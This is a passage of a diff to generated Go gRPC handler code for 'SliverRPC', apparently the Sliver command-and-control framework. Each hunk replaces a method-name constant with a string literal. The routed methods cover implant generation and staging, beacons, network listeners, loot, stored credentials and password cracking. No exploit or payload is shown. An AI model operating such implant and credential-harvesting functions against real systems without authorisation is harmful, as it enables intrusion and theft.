return srv.(SliverRPCServer).MonitorListConfig(ctx, req.(*commonpb.Empty))
@@ -3188,7 +2989,7 @@ func _SliverRPC_MonitorAddConfig_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MonitorAddConfig_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MonitorAddConfig",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).MonitorAddConfig(ctx, req.(*clientpb.MonitoringProvider))
@@ -3206,7 +3007,7 @@ func _SliverRPC_MonitorDelConfig_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MonitorDelConfig_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MonitorDelConfig",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).MonitorDelConfig(ctx, req.(*clientpb.MonitoringProvider))
@@ -3224,7 +3025,7 @@ func _SliverRPC_StartMTLSListener_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StartMTLSListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StartMTLSListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StartMTLSListener(ctx, req.(*clientpb.MTLSListenerReq))
@@ -3242,7 +3043,7 @@ func _SliverRPC_StartWGListener_Handler(srv interface{}, ctx context.Context, de
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StartWGListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StartWGListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StartWGListener(ctx, req.(*clientpb.WGListenerReq))
@@ -3260,7 +3061,7 @@ func _SliverRPC_StartDNSListener_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StartDNSListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StartDNSListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StartDNSListener(ctx, req.(*clientpb.DNSListenerReq))
@@ -3278,7 +3079,7 @@ func _SliverRPC_StartHTTPSListener_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StartHTTPSListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StartHTTPSListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StartHTTPSListener(ctx, req.(*clientpb.HTTPListenerReq))
@@ -3296,7 +3097,7 @@ func _SliverRPC_StartHTTPListener_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StartHTTPListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StartHTTPListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StartHTTPListener(ctx, req.(*clientpb.HTTPListenerReq))
@@ -3314,7 +3115,7 @@ func _SliverRPC_GetBeacons_Handler(srv interface{}, ctx context.Context, dec fun
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetBeacons_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetBeacons",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetBeacons(ctx, req.(*commonpb.Empty))
@@ -3332,7 +3133,7 @@ func _SliverRPC_GetBeacon_Handler(srv interface{}, ctx context.Context, dec func
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetBeacon_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetBeacon",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetBeacon(ctx, req.(*clientpb.Beacon))
@@ -3350,7 +3151,7 @@ func _SliverRPC_RmBeacon_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RmBeacon_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RmBeacon",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RmBeacon(ctx, req.(*clientpb.Beacon))
@@ -3368,7 +3169,7 @@ func _SliverRPC_GetBeaconTasks_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetBeaconTasks_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetBeaconTasks",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetBeaconTasks(ctx, req.(*clientpb.Beacon))
@@ -3386,7 +3187,7 @@ func _SliverRPC_GetBeaconTaskContent_Handler(srv interface{}, ctx context.Contex
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetBeaconTaskContent_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetBeaconTaskContent",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetBeaconTaskContent(ctx, req.(*clientpb.BeaconTask))
@@ -3404,7 +3205,7 @@ func _SliverRPC_CancelBeaconTask_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CancelBeaconTask_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CancelBeaconTask",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CancelBeaconTask(ctx, req.(*clientpb.BeaconTask))
@@ -3422,7 +3223,7 @@ func _SliverRPC_UpdateBeaconIntegrityInformation_Handler(srv interface{}, ctx co
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_UpdateBeaconIntegrityInformation_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/UpdateBeaconIntegrityInformation",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).UpdateBeaconIntegrityInformation(ctx, req.(*clientpb.BeaconIntegrity))
@@ -3440,7 +3241,7 @@ func _SliverRPC_GetJobs_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetJobs_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetJobs",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetJobs(ctx, req.(*commonpb.Empty))
@@ -3458,7 +3259,7 @@ func _SliverRPC_KillJob_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_KillJob_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/KillJob",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).KillJob(ctx, req.(*clientpb.KillJobReq))
@@ -3476,7 +3277,7 @@ func _SliverRPC_RestartJobs_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RestartJobs_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RestartJobs",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RestartJobs(ctx, req.(*clientpb.RestartJobReq))
@@ -3494,7 +3295,7 @@ func _SliverRPC_StartTCPStagerListener_Handler(srv interface{}, ctx context.Cont
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StartTCPStagerListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StartTCPStagerListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StartTCPStagerListener(ctx, req.(*clientpb.StagerListenerReq))
@@ -3512,7 +3313,7 @@ func _SliverRPC_LootAdd_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_LootAdd_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/LootAdd",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).LootAdd(ctx, req.(*clientpb.Loot))
@@ -3530,7 +3331,7 @@ func _SliverRPC_LootRm_Handler(srv interface{}, ctx context.Context, dec func(in
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_LootRm_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/LootRm",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).LootRm(ctx, req.(*clientpb.Loot))
@@ -3548,7 +3349,7 @@ func _SliverRPC_LootUpdate_Handler(srv interface{}, ctx context.Context, dec fun
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_LootUpdate_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/LootUpdate",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).LootUpdate(ctx, req.(*clientpb.Loot))
@@ -3566,7 +3367,7 @@ func _SliverRPC_LootContent_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_LootContent_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/LootContent",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).LootContent(ctx, req.(*clientpb.Loot))
@@ -3584,7 +3385,7 @@ func _SliverRPC_LootAll_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_LootAll_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/LootAll",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).LootAll(ctx, req.(*commonpb.Empty))
@@ -3602,7 +3403,7 @@ func _SliverRPC_Creds_Handler(srv interface{}, ctx context.Context, dec func(int
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Creds_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Creds",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Creds(ctx, req.(*commonpb.Empty))
@@ -3620,7 +3421,7 @@ func _SliverRPC_CredsAdd_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CredsAdd_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CredsAdd",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CredsAdd(ctx, req.(*clientpb.Credentials))
@@ -3638,7 +3439,7 @@ func _SliverRPC_CredsRm_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CredsRm_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CredsRm",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CredsRm(ctx, req.(*clientpb.Credentials))
@@ -3656,7 +3457,7 @@ func _SliverRPC_CredsUpdate_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CredsUpdate_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CredsUpdate",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CredsUpdate(ctx, req.(*clientpb.Credentials))
@@ -3674,7 +3475,7 @@ func _SliverRPC_GetCredByID_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetCredByID_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetCredByID",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetCredByID(ctx, req.(*clientpb.Credential))
@@ -3692,7 +3493,7 @@ func _SliverRPC_GetCredsByHashType_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetCredsByHashType_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetCredsByHashType",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetCredsByHashType(ctx, req.(*clientpb.Credential))
@@ -3710,7 +3511,7 @@ func _SliverRPC_GetPlaintextCredsByHashType_Handler(srv interface{}, ctx context
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetPlaintextCredsByHashType_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetPlaintextCredsByHashType",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetPlaintextCredsByHashType(ctx, req.(*clientpb.Credential))
@@ -3728,7 +3529,7 @@ func _SliverRPC_CredsSniffHashType_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CredsSniffHashType_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CredsSniffHashType",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CredsSniffHashType(ctx, req.(*clientpb.Credential))
@@ -3746,7 +3547,7 @@ func _SliverRPC_Hosts_Handler(srv interface{}, ctx context.Context, dec func(int
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Hosts_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Hosts",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Hosts(ctx, req.(*commonpb.Empty))
@@ -3764,7 +3565,7 @@ func _SliverRPC_Host_Handler(srv interface{}, ctx context.Context, dec func(inte
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Host_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Host",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Host(ctx, req.(*clientpb.Host))
@@ -3782,7 +3583,7 @@ func _SliverRPC_HostRm_Handler(srv interface{}, ctx context.Context, dec func(in
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_HostRm_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/HostRm",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).HostRm(ctx, req.(*clientpb.Host))
@@ -3800,7 +3601,7 @@ func _SliverRPC_HostIOCRm_Handler(srv interface{}, ctx context.Context, dec func
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_HostIOCRm_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/HostIOCRm",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).HostIOCRm(ctx, req.(*clientpb.IOC))
@@ -3818,7 +3619,7 @@ func _SliverRPC_Generate_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Generate_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Generate",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Generate(ctx, req.(*clientpb.GenerateReq))
@@ -3836,7 +3637,7 @@ func _SliverRPC_GenerateExternal_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GenerateExternal_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GenerateExternal",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GenerateExternal(ctx, req.(*clientpb.ExternalGenerateReq))
@@ -3854,7 +3655,7 @@ func _SliverRPC_GenerateExternalSaveBuild_Handler(srv interface{}, ctx context.C
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GenerateExternalSaveBuild_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GenerateExternalSaveBuild",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GenerateExternalSaveBuild(ctx, req.(*clientpb.ExternalImplantBinary))
@@ -3872,7 +3673,7 @@ func _SliverRPC_GenerateExternalGetBuildConfig_Handler(srv interface{}, ctx cont
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GenerateExternalGetBuildConfig_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GenerateExternalGetBuildConfig",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GenerateExternalGetBuildConfig(ctx, req.(*clientpb.ImplantBuild))
@@ -3890,7 +3691,7 @@ func _SliverRPC_GenerateStage_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GenerateStage_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GenerateStage",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GenerateStage(ctx, req.(*clientpb.GenerateStageReq))
@@ -3908,7 +3709,7 @@ func _SliverRPC_StageImplantBuild_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StageImplantBuild_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StageImplantBuild",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StageImplantBuild(ctx, req.(*clientpb.ImplantStageReq))
@@ -3926,7 +3727,7 @@ func _SliverRPC_GetHTTPC2Profiles_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetHTTPC2Profiles_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetHTTPC2Profiles",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetHTTPC2Profiles(ctx, req.(*commonpb.Empty))
@@ -3944,7 +3745,7 @@ func _SliverRPC_GetHTTPC2ProfileByName_Handler(srv interface{}, ctx context.Cont
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetHTTPC2ProfileByName_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetHTTPC2ProfileByName",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetHTTPC2ProfileByName(ctx, req.(*clientpb.C2ProfileReq))
@@ -3962,7 +3763,7 @@ func _SliverRPC_SaveHTTPC2Profile_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_SaveHTTPC2Profile_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/SaveHTTPC2Profile",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).SaveHTTPC2Profile(ctx, req.(*clientpb.HTTPC2ConfigReq))
@@ -4001,7 +3802,7 @@ func _SliverRPC_BuilderTrigger_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_BuilderTrigger_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/BuilderTrigger",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).BuilderTrigger(ctx, req.(*clientpb.Event))
@@ -4019,7 +3820,7 @@ func _SliverRPC_Builders_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Builders_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Builders",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Builders(ctx, req.(*commonpb.Empty))
@@ -4037,7 +3838,7 @@ func _SliverRPC_GetCertificateInfo_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetCertificateInfo_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetCertificateInfo",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetCertificateInfo(ctx, req.(*clientpb.CertificatesReq))
@@ -4076,7 +3877,7 @@ func _SliverRPC_CrackstationTrigger_Handler(srv interface{}, ctx context.Context
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackstationTrigger_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackstationTrigger",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackstationTrigger(ctx, req.(*clientpb.Event))
@@ -4094,7 +3895,7 @@ func _SliverRPC_CrackstationBenchmark_Handler(srv interface{}, ctx context.Conte
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackstationBenchmark_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackstationBenchmark",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackstationBenchmark(ctx, req.(*clientpb.CrackBenchmark))
@@ -4112,7 +3913,7 @@ func _SliverRPC_Crackstations_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Crackstations_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Crackstations",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Crackstations(ctx, req.(*commonpb.Empty))
@@ -4130,7 +3931,7 @@ func _SliverRPC_CrackTaskByID_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackTaskByID_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackTaskByID",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackTaskByID(ctx, req.(*clientpb.CrackTask))
@@ -4148,7 +3949,7 @@ func _SliverRPC_CrackTaskUpdate_Handler(srv interface{}, ctx context.Context, de
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackTaskUpdate_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackTaskUpdate",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackTaskUpdate(ctx, req.(*clientpb.CrackTask))
@@ -4166,7 +3967,7 @@ func _SliverRPC_CrackFilesList_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackFilesList_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackFilesList",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackFilesList(ctx, req.(*clientpb.CrackFile))
@@ -4184,7 +3985,7 @@ func _SliverRPC_CrackFileCreate_Handler(srv interface{}, ctx context.Context, de
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackFileCreate_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackFileCreate",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackFileCreate(ctx, req.(*clientpb.CrackFile))
@@ -4202,7 +4003,7 @@ func _SliverRPC_CrackFileChunkUpload_Handler(srv interface{}, ctx context.Contex
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackFileChunkUpload_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackFileChunkUpload",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackFileChunkUpload(ctx, req.(*clientpb.CrackFileChunk))
@@ -4220,7 +4021,7 @@ func _SliverRPC_CrackFileChunkDownload_Handler(srv interface{}, ctx context.Cont
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackFileChunkDownload_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackFileChunkDownload",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackFileChunkDownload(ctx, req.(*clientpb.CrackFileChunk))
@@ -4238,7 +4039,7 @@ func _SliverRPC_CrackFileComplete_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackFileComplete_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackFileComplete",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackFileComplete(ctx, req.(*clientpb.CrackFile))
@@ -4256,7 +4057,7 @@ func _SliverRPC_CrackFileDelete_Handler(srv interface{}, ctx context.Context, de
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CrackFileDelete_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CrackFileDelete",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CrackFileDelete(ctx, req.(*clientpb.CrackFile))
@@ -4274,7 +4075,7 @@ func _SliverRPC_Regenerate_Handler(srv interface{}, ctx context.Context, dec fun
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Regenerate_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Regenerate",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Regenerate(ctx, req.(*clientpb.RegenerateReq))
@@ -4292,7 +4093,7 @@ func _SliverRPC_ImplantBuilds_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ImplantBuilds_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ImplantBuilds",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ImplantBuilds(ctx, req.(*commonpb.Empty))
@@ -4310,7 +4111,7 @@ func _SliverRPC_DeleteImplantBuild_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_DeleteImplantBuild_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/DeleteImplantBuild",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).DeleteImplantBuild(ctx, req.(*clientpb.DeleteReq))
@@ -4328,7 +4129,7 @@ func _SliverRPC_Canaries_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Canaries_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Canaries",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Canaries(ctx, req.(*commonpb.Empty))
@@ -4346,7 +4147,7 @@ func _SliverRPC_GenerateWGClientConfig_Handler(srv interface{}, ctx context.Cont
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GenerateWGClientConfig_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GenerateWGClientConfig",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GenerateWGClientConfig(ctx, req.(*commonpb.Empty))
@@ -4364,7 +4165,7 @@ func _SliverRPC_GenerateUniqueIP_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GenerateUniqueIP_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GenerateUniqueIP",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GenerateUniqueIP(ctx, req.(*commonpb.Empty))
@@ -4382,7 +4183,7 @@ func _SliverRPC_ImplantProfiles_Handler(srv interface{}, ctx context.Context, de
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ImplantProfiles_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ImplantProfiles",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ImplantProfiles(ctx, req.(*commonpb.Empty))
@@ -4400,7 +4201,7 @@ func _SliverRPC_DeleteImplantProfile_Handler(srv interface{}, ctx context.Contex
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_DeleteImplantProfile_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/DeleteImplantProfile",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).DeleteImplantProfile(ctx, req.(*clientpb.DeleteReq))
@@ -4418,7 +4219,7 @@ func _SliverRPC_SaveImplantProfile_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_SaveImplantProfile_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/SaveImplantProfile",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).SaveImplantProfile(ctx, req.(*clientpb.ImplantProfile))
@@ -4426,24 +4227,6 @@ func _SliverRPC_SaveImplantProfile_Handler(srv interface{}, ctx context.Context,
